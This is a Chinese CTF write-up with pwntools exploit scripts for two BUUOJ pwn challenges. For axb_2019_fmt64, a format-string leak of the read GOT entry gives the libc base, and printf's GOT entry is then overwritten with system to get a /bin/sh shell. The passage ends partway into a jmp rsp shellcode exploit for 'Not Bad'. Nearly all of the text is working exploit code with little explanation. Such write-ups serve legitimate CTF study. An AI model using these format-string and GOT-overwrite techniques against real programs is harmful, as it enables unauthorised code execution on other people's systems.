目录
axb_2019_fmt64(格式化字符串泄露信息+修改GOT表)
本题原理并不复杂,直接贴Exp吧:
from pwn import *
r = remote("node3.buuoj.cn", 28352)
#r = process("./axb_2019_fmt64")
context.log_level = 'debug'
DEBUG = 0
if DEBUG:
gdb.attach(r,
'''
b *0x400957
x/gx 0x601030
c
''')
elf = ELF("./axb_2019_fmt64")
libc = ELF('./libc/libc-2.23.so')
read_got = elf.got['read']
printf_got = elf.got['printf']
success("read_got:" + hex(read_got))
r.recvuntil("Please tell me:")
payload = '%9$s'.ljust(8, 'a') + p64(read_got)
r.sendline(payload)
r.recvuntil("Repeater:")
read_addr = u64(r.recvuntil('\x7f').ljust(8, '\x00'))
libc.address = read_addr - libc.symbols['read']
system = libc.symbols['system']
printf = libc.sym['printf']
success("read:" + hex(read_addr))
success("system:" + hex(system))
success("printf:"+hex(printf))
r.recvuntil("Please tell me:")
num1 = ((system>>16) & 0xFF) - len("Repeater:")
num2 = (system & 0xFFFF) - ((system>>16) & 0xFF)
payload = '%' + str(num1) + 'c%12$hhn%'
payload += str(num2) + 'c%13$hn'
payload = payload.ljust(32, 'a') + p64(printf_got+2) + p64(printf_got)
print payload
r.sendline(payload)
r.recv()
r.sendline(';/bin/sh')
r.interactive()
[极客大挑战 2019]Not Bad(jmp rsp,写shellcode)
居然没有保护,然而
需要写一个open,read,write的shellcode来执行
from pwn import *
r = remote("node3.buuoj.cn", 29344)
#r = process("./bad")
DEBUG = 0
if DEBUG:
gdb.attach(r,
'''
b *0x400A4A
c
''')
context(arch = 'amd64', os = 'linux', log_level = 'debug')
elf = ELF("./bad")
libc = ELF('./libc/libc-2.27.so')
jmp_rsp = 0x400A01
mmap = 0x123000
r.recvuntil("Easy shellcode, have fun!\n")
payload